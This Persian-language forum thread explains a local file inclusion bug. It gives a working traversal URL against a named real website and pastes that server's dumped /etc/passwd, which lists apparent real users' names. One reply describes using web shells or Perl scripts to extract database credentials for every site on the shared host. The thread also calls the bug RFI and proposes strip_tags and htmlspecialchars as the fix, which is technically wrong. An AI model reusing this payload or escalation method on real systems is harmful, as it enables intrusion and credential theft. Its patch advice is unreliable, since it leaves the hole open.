رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سلام

اگه میشه در باره باگ lfi که توی مسابقه ۴ روم بود یکم بیشتر توضیح بدید؟

page= این چیه که به تارگت اضافه شد اگه میشه کامل توضیح بدید و بعد تا چه حد میتونه این باگ خطرناک باشه یعنی میشه بسورد سایت رو هم کشید بیرون!

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام من نبودم تو این مسابقه که شرکت کنم ولی این باگ بسیار باگ راحت و در عین حال بسیار خطرناک تر که در بعضی مواقع کنترل سرور رو میتونه در درست نفوذگر بزاره

 

خب این تارگتش بود

http://www.thesom.org/

خب توی این نوع از این آسیب پذیری به ما امکان مشاهده فایل های مختلف رو میده یعنی چی یعنی دسترسی یک یوزر بیش از حد مجاز 

 

فایل etc/passwd

 

یک فایل توی لینوکسه که اطلاعات یوزر های مختلف داخلش هست البته همینطوریم نمی شه ازش استفاده کرد نیاز به یک سری مراحلی داره خب ادرس این فایل اینطوری بود 

http://www.thesom.org/index.php?page=../../../etc/passwd

اما این ../ از کجا اومد

 

اگه لینوکس داشتید بهتر میتونستید این قضیرو درک کنید

http://www.thesom.org/index.php?page=test

این پیج رو ببینید

 

هب ما از اینجا چیو میفهمیمیم اینو که این اسکریپ یا فیل پی اچ پی داره اینجا اجرا میشه

/home/thesom/html/index.php

خب حالا فرض کنید پشه etc/passwd روی دسکتاپه برای این که هر بار بریم عقب اینطوری میریم ../ این جز کامند های لینوکسیه

/home/../../..

حالا اینطوری اجراش میکنیم

http://www.thesom.org/index.php?page=../../../

میبینید که هیچ اروری نداد یعنی اسکریپت داره میگه چیزی خراب نیست و فایلی هم برای نمایش انتخاب نشده پس چون خودمون با لینوکس اشنا هستیم و می فهمیم که  الان با ../ رسیدیم به دایروکتوری home میایم ی etc/passwd اضاف می کنیم و اسکریپت به دلیل ضعف امینیتی اون فایل رو نشون میده

http://www.thesom.org/index.php?page=../../../etc/passwd

حالا نحوه پچ باگ

این باگ رو هم همینطور که میدونید شایدم ندونید از تابع زیر به وجود میاد

include

باید ما ازین توابع استفاده کنیم تا نفوذگر نتونه کاری رو از پیش ببره

strip_tags
htmlspecialchars
stripslashes

فقط برای اخری شاید بعضی وقتا یک سری مشکلاتی پیش بیاد وشما نباید از دایروکتوری های دیگه فایل رو فراخوانی کنید 

 

راستی این باگ هم rfi هست نه lfi یعنی remote file inclution

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

خیلی ممنون عالی بود

ولی یه سوال دیگه تارگتی که گذاشتید http://www.thesom.org/ اینو index.php?page= نداره چرا باید اضافه بشه

آیا همیشه باید این اضافه بشه.

 

الان این تارگی رو که باگ rfi داشت چه اطلاعات مهمی داره برای نفوذ

من الان چیزی برای نفذ به سایت نمیبینم اگه میشه توضیح بدید http://www.thesom.org/index.php?page=../../../etc/passwd

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

ببینید اینها همه توی فایل php اسکریپتی به اسم index.php دارن اجرا میشن و چون از متود get استفاده شده توی وب نمایش میده و ما هم میبیبیم اول ی دعا میکنیم که خدا اون کسی که این اسکریپتو نوشته شفا بده

 

بعد تست می کنیم ببینیم اصلا چیزی فیلتر شده یا نه که خدا خیرش بده هیچی فیلتر نشده (برای یکم لبخند)

 

ببنینید اینها که الان هیچی برای نفوذ توی دست من و شما نمیزارن اما این یک پوشه فایل مهم هستش که اطلاعات یوزر های دیگه رو روی سرور در خودش داره اینهارو میان با استفاده از یک سری شل ها مثل webr00t یا اسکریپت هایی که به زبان پرل موجود هستش استفاده می کنن و کانفیگ تمام سایت های روی سرور یعنی یوزر نیم و پسورد دیتابیس تمام سایت های روی سرور رو در میارن که کار خیلی آسونی هستش

بعد دیگه مثلا 150 تا سایت روی سرور بای

 

کار خاصی نیست فقط 2 تا کلیکه ولی بعضی وقتا ینی بیشتر وقتا باید یکم ور برید با سرور و پایبیسش کنید تا بتونید کانفیگ هارو در بیارید بالاخره ارایه دهنده وب سرور اصلا دوست نداره اعتبارش زیر سوال بره ولی خب آسونه باز پایبیس کردنش میتونید با یکم تحقیق چییزای خوبی پیدا کنید

 

منظورم با اینها هستش:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash haldaemon:x:68:68:HAL daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin mark:x:501:501:Mark Keeran:/home/mark:/bin/bash darren:x:502:502:Darren Farrish:/home/darren:/bin/bash donny:x:503:503:Donny Drummonds:/home/donny:/bin/bash adam:x:504:504:Adam Richey:/home/adam:/bin/bash markhome:x:507:507::/home/markhome:/bin/bash markwork:x:508:508::/home/markwork:/bin/bash wynell:x:517:517::/home/wynell:/bin/bash mawdi:x:519:519::/home/mawdi/data:/bin/bash ky:x:520:520::/home/ky:/bin/bash backups:x:523:523::/home/backups:/bin/bash cc_hold:x:524:524::/home/cc_hold:/bin/bash kyoung:x:526:526::/home/kyoung:/bin/bash markimages:x:532:532::/home/markimages:/bin/bash pvp:x:533:533::/home/pvp:/bin/bash mailman:x:41:41:GNU Mailing List Manager:/var/mailman:/bin/false ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false dbf_windows:x:560:560::/home/dbf_windows:/bin/bash dbf_unix:x:561:561::/home/dbf_unix:/bin/bash donnytest:x:562:562::/home/donnytest:/bin/bash vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin dbf_road:x:597:597::/home/dbf_road:/bin/bash amelia:x:624:624::/home/amelia:/bin/bash sapdb:x:656:656::/home/sapdb:/bin/bash mailer:x:667:667::/home/mailer:/bin/bash clamav:x:100:11:Clam Anti Virus Checker:/var/clamav:/sbin/nologin fun3kids:x:694:1000:C Farrish:/home/fun3kids:/bin/true ntp:x:700:700::/home/ntp:/bin/bash rotary:x:702:702::/home/sprrotary/html:/bin/bash cellie-mart:x:707:707::/home/cellie-mart:/bin/bash adamwork:x:709:709::/home/adam/adamwork:/bin/bash adamhome:x:710:710::/home/adam/adamhome:/bin/bash nellbell:x:715:715::/home/nellbell:/bin/bash matt:x:716:716::/home/matt:/bin/bash rob:x:717:1017:Rob Armstrong:/home/ah-ins/rob:/bin/true steve:x:718:1017:Steve Hailey:/home/ah-ins/steve:/bin/true bruce:x:719:1017:Bruce Armstrong:/home/ah-ins/bruce:/bin/true melissa:x:720:1017:Melissa:/home/ah-ins/melissa:/bin/true beth:x:722:1017:Beth Armstrong:/home/ah-ins/beth:/bin/true monitor:x:723:1018::/home/monitor:/bin/bash christy:x:724:1017:Christy:/home/ah-ins/christy:/bin/true kathy:x:725:725::/home/kathy:/bin/bash testuser:x:726:726::/home/testuser:/bin/nologin trent:x:727:727::/home/trent:/bin/bash razorbackhockey:x:728:728::/home/razorbackhockey:/bin/bash rentals:x:729:729::/home/rentals:/bin/bash rotary_dev:x:731:731::/home/sprrotary/dev:/bin/bash emily:x:732:1017:Emily:/home/ah-ins/emily:/bin/true cci:x:733:733::/home/cci:/bin/bash kyle:x:736:736::/home/kyle:/bin/bash evan:x:737:737::/home/evan:/bin/bash dwverify:x:738:738::/home/dwverify:/sbin/nologin greg:x:739:739::/home/ah-ins/greg:/bin/true select2textsupport:x:740:740::/home/select2textsupport:/bin/bash hannah:x:741:741::/home/hannah:/bin/bash abby:x:742:742::/home/abby:/bin/bash holly:x:743:743::/home/holly:/bin/bash lana:x:744:744::/home/ah-ins/lana:/bin/true jmcdaniel:x:745:745::/home/jmcdaniel:/bin/bash nick:x:746:746::/home/nick:/bin/bash randy:x:747:747::/home/randy:/bin/bash sarah:x:748:748::/home/sarah:/bin/bash svc:x:749:749::/home/svc:/bin/bash rrdcached:x:101:102:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin kalie:x:750:750::/home/kalie:/sbin/nologin dsa:x:751:751::/home/dsa:/bin/bash hacluster:x:498:496::/var/lib/heartbeat/cores/hacluster:/bin/bash nagios:x:499:499:nagios:/var/log/nagios:/bin/sh munin:x:15:17:Munin user:/var/lib/munin:/bin/nologin canada_emodel:x:752:752::/home/canada_emodel:/bin/bash ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin cimsrvr:x:17:1020:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin ricci:x:18:24:ricci daemon user:/var/lib/ricci:/sbin/nologin luci:x:19:27::/var/lib/luci:/sbin/nologin
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...